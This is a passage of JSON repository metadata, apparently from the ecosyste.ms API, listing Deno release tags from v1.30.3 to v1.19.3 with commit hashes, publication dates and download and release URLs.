no/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"